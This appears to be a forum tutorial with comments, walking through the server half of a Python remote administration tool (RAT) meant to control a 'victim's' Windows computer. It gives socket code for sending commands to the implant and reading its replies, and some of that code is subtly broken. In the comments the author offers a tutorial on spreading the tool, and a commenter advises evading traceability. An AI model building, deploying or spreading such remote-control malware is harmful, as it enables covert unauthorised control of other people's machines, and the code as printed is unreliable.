I saw many people asking for a Tutorial about writing their own Remote Administration Tool, so I now introduce you in a basic kind of RAT. This program is not for real use, but for learning how you could write this kind of tool. It will be basicly coded and not very refined. I used Python 3, so you have to install it if you want to use this program unchanged. Also this RAT is for Windows and almost all features won't work under Linux.
Ok, the RAT works with 2 different parts. The first is for sure the malicious one, which you have to put on the victims computer and the other one will control the victims computer. From now on I will call the first part "client" and the second one "server".
I assume for this tutorial that you know how RATs generally work and how to program with Python. Python is a great language for beginners, so I think nobody will get problems with understanding the Code, but if you want to learn Python, just search on Null-Byte for "Python Tutorial". You will find many ressources on that.
The Server Code
You can find the full Source here. I will try to explain the Source.
---Imports---
-Socket is required for networking
-os is required for clearing the terminal (Will be seen later)
---Variables---
-port is for selecting the connection port. You can use everyone you want, but I recommend to use one, which is probably not obtrusive/blocked.
---Functions---
-We got only one Function at the moment, which is used for clearing the terminal (Just an esthetic feature ;) )
---Starting Server---
serversocket = socket.socket(socket.AFINET, socket.SOCKSTREAM)
This sets up a TCP Socket connection.
host = socket.gethostname()
serversocket.bind((host, port))
serversocket.listen(1)
These lines starts the listening of the Server. The last line specifies to allow only 1 connection, which is Ok at the beginning of our little RAT, but can be modified later.
clear()
Clears terminal.
print
Should be clear, isn't it?
clientsocket, addr = serversocket.accept()
Waiting for incoming Connection.
print("Connection from: " + str(addr))
Printing out the Connection Details.
msg = inpu()
Getting the instruction, which will be send to the Client.
if msg == "help":
clear()
print("-+-+-+-+-+HELP+-+-+-+-+-")
print("Test Connection: 'test'")
input("\nPress ENTER to continue")
Just a Help Window. You can see just one Instruction at the Moment, which we can use after setting up the Client.
else:
msg = msg.encode("UTF-8")
clientsocket.send(msg)
msg = clientsocket.recv(4096)
print(msg.decode("UTF-8"))
Every Message, which is not 'help' will be send to the Client, then the Server waits for the response and prints it out. The message is encoded with UTF-8, because bytes are required for sending over networks.
Conclusion
Now we've got a working Server for sending and receiving Instructions. You can see, that it's not pretty good coded, but for learning some basics it's good enough :) I hope you learned something about the basics of programming a RAT. Please give response whether I explain more detailed or what I should add as feature to the RAT. In the next Part we will setup the Client, the heart of our RAT, but for all who don't want to wait and want to test it out now, this will help you out ;) Just change the lHost Variable to the IP of your Servers computer and start trying.
~Thogs
Just updated your iPhone to iOS 18? You'll find a ton of hot new features for some of your most-used Apple apps. Dive in and see for yourself:
11 Comments
not bad, I like the tutorial. However you can go in depth a little more, explaining for example what the client does and and how you would install it on a victims pc, etc. otherwise good job +1
Thank you for the response. We will look on the Client in the next Part. If you want to, I can write a Tutorial about spreading after that.
ya that'd be great. Thx for contributing the great post!
that will be appreciated and this one is a good tutorial ;D
I'm going to have to take a look at the socket library. +1 for the detailed tutorial.
What is a socket?
A socket is sort of a logical term. A socket is bound to a port and used to communicate across a network. Python sockets are no different. You bind them to ports, and use them to make and use connections. Simply put, a socket allows two devices to communicate.
-Defalt
Very good however unfortunately it is very dangerous to use. This is because you are making the rat connect to your server, which means the client will have your ip in the source. And python files are not hard to decompile, so be careful. You'd much rather be using a reverse connection, so their machine is a server to be connected to by an untraceable client.
Robyn
In part 2 of this little series I wrote at the beggining that this piece of code is not for use in real scenarios. It's very basicly written, because it's just for learning purposes, so I didn't use reverse connection or escaping technics.
Just wanted to make that clear for anyone using the code
Robyn
Trying to create my own RAT, could you guide me please?......Thnx
Share Your Thoughts